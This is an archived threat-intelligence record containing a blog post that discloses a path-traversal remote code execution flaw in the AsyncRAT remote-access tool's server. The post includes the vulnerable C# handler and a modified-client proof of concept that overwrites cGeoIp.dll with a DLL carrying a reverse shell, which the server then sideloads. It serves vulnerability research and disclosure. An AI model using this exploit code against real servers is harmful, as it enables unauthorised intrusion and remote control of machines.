{
	"id": "563a4c0b-c108-408d-b73c-0d4cf9bf557f",
	"created_at": "2026-04-06T00:14:16.127217Z",
	"updated_at": "2026-04-10T13:12:25.425669Z",
	"deleted_at": null,
	"sha1_hash": "a3ed0b57ece39911455a46ba11c72876bc9d0e84",
	"title": "AsyncRAT RCE vulnerability",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 326062,
	"plain_text": "AsyncRAT RCE vulnerability\r\nBy Brian Stadnicki\r\nPublished: 2022-03-12 · Archived: 2026-04-05 19:37:35 UTC\r\nAsyncRAT is an open source RAT (Remote Access Tool). While it isn’t typically used for advanced attacks, it’s\r\nvery common in gaming scenes, thanks to how easy to use and surprisingly polished it is. Thankfully, there exists\r\na RCE flaw.\r\nThe AsyncRAT server listens by default on 6606, 7707 and 8808. No authentication is required to connect to a\r\nserver, with commands being sent over a tcp ssl socket connection, with a custom msgpack implementation and\r\ngzip stream compression.\r\nThere are many commands, but since this is written in C#, the easiest attack vector is to sideload a DLL, so the\r\ncommands of interest write a file.\r\nCommand: socketDownload/save\r\n string dwid = unpack_msgpack.ForcePathObject(\"DWID\").AsString;\r\nFormDownloadFile SD = (FormDownloadFile)Application.OpenForms[\"socketDownload:\" + dwid];\r\nif (SD != null)\r\n{\r\n if (!Directory.Exists(SD.DirPath))\r\n return;\r\n string fileName = unpack_msgpack.ForcePathObject(\"Name\").AsString;\r\n string dirPath = SD.DirPath;\r\n if (File.Exists(dirPath + \"\\\\\" + fileName))\r\nhttps://brianstadnicki.github.io/posts/vulnerability-asyncrat-rce/\r\nPage 1 of 4\n\n{\r\n fileName = DateTime.Now.ToString(\"MM-dd-yyyy HH;mm;ss\") + \"_\" + fileName;\r\n await Task.Delay(100);\r\n }\r\n await Task.Run(() =\u003e SaveFileAsync(unpack_msgpack.ForcePathObject(\"File\"), dirPath + \"\\\\\" + fileName));\r\n SD.Close();\r\n}\r\nAs we can see, the file is saved to the form’s download directory appended with the file name. As there is no\r\nsanitisation for the file name, it is vulnerable to a path traversal attack. The vulnerability is limited by the form\r\ncheck, which results in the vulnerability only working when the attacker is downloading a file. This means that\r\nduring a file download, the server is vulnerable.\r\nFor the purposes of this proof of concept, I will exploit it when the client has a file requested. It would be possible\r\nto keep sending a command to exploit this, especially because the connected client doesn’t show in the list view or\r\nlogs until the client sends identification information.\r\nIn order to exploit a dll-sideloading vulnerability, I need to identify a DLL to replace. I choose cGeoIp.dll ,\r\nwhich appears to be used for geolocation of clients from their IP addresses. This DLL is also effective because it is\r\nloaded when the server is started.\r\nThe DLL is included in the project’s resources, so I edit in a C# reverse shell using dnSpy.\r\nFor the exploitation itself, instead of writing a custom client for AsyncRAT, I found it easier to edit the client\r\nitself. Especially because my POC exploits the attacker trying to download a file, so keeping all the features helps\r\nconvince the attacker to continue exploring the client and trigger the vulnerability.\r\nprivate bool infected = false;\r\npublic void DownnloadFile(string file, string dwid)\r\n{\r\n TempSocket tempSocket = new TempSocket();\r\n try\r\n {\r\n if (!infected)\r\n {\r\n infected = true;\r\n MsgPack msgpack = new MsgPack();\r\n msgpack.ForcePathObject(\"Packet\").AsString = \"socketDownload\";\r\n msgpack.ForcePathObject(\"Hwid\").AsString = Connection.Hwid;\r\n msgpack.ForcePathObject(\"Command\").AsString = \"pre\";\r\n msgpack.ForcePathObject(\"DWID\").AsString = dwid;\r\n msgpack.ForcePathObject(\"File\").AsString = \"../../cGeoIp.dll\";\r\n msgpack.ForcePathObject(\"Size\").AsString = new FileInfo(\"cGeoIp.dll\").Length.ToString();\r\nhttps://brianstadnicki.github.io/posts/vulnerability-asyncrat-rce/\r\nPage 2 of 4\n\ntempSocket.Send(msgpack.Encode2Bytes());\r\n MsgPack msgpack2 = new MsgPack();\r\n msgpack2.ForcePathObject(\"Packet\").AsString = \"socketDownload\";\r\n msgpack.ForcePathObject(\"Hwid\").AsString = Connection.Hwid;\r\n msgpack2.ForcePathObject(\"Command\").AsString = \"save\";\r\n msgpack2.ForcePathObject(\"DWID\").AsString = dwid;\r\n msgpack2.ForcePathObject(\"Name\").AsString = \"../../cGeoIp.dll\";\r\n msgpack2.ForcePathObject(\"File\").LoadFileAsBytes(\"cGeoIp.dll\");\r\n tempSocket.Send(msgpack2.Encode2Bytes());\r\n }\r\n MsgPack msgpack = new MsgPack();\r\n msgpack.ForcePathObject(\"Packet\").AsString = \"socketDownload\";\r\n msgpack.ForcePathObject(\"Hwid\").AsString = Connection.Hwid;\r\n msgpack.ForcePathObject(\"Command\").AsString = \"pre\";\r\n msgpack.ForcePathObject(\"DWID\").AsString = dwid;\r\n msgpack.ForcePathObject(\"File\").AsString = file;\r\n msgpack.ForcePathObject(\"Size\").AsString = new FileInfo(file).Length.ToString();\r\n tempSocket.Send(msgpack.Encode2Bytes());\r\n MsgPack msgpack2 = new MsgPack();\r\n msgpack2.ForcePathObject(\"Packet\").AsString = \"socketDownload\";\r\n msgpack.ForcePathObject(\"Hwid\").AsString = Connection.Hwid;\r\n msgpack2.ForcePathObject(\"Command\").AsString = \"save\";\r\n msgpack2.ForcePathObject(\"DWID\").AsString = dwid;\r\n msgpack2.ForcePathObject(\"Name\").AsString = Path.GetFileName(file);\r\n msgpack2.ForcePathObject(\"File\").LoadFileAsBytes(file);\r\n tempSocket.Send(msgpack2.Encode2Bytes());\r\n }\r\n catch\r\n {\r\n tempSocket?.Dispose();\r\n return;\r\n }\r\n}\r\nThe AsyncRAT client has the modified cGeoIp.dll in the same directory. In order to not raise suspicions, the\r\nrequested file is also sent, as the server doesn’t keep track of state.\r\nhttps://brianstadnicki.github.io/posts/vulnerability-asyncrat-rce/\r\nPage 3 of 4\n\nSource: https://brianstadnicki.github.io/posts/vulnerability-asyncrat-rce/\r\nhttps://brianstadnicki.github.io/posts/vulnerability-asyncrat-rce/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://brianstadnicki.github.io/posts/vulnerability-asyncrat-rce/"
	],
	"report_names": [
		"vulnerability-asyncrat-rce"
	],
	"threat_actors": [],
	"ts_created_at": 1775434456,
	"ts_updated_at": 1775826745,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a3ed0b57ece39911455a46ba11c72876bc9d0e84.pdf",
		"text": "https://archive.orkl.eu/a3ed0b57ece39911455a46ba11c72876bc9d0e84.txt",
		"img": "https://archive.orkl.eu/a3ed0b57ece39911455a46ba11c72876bc9d0e84.jpg"
	}
}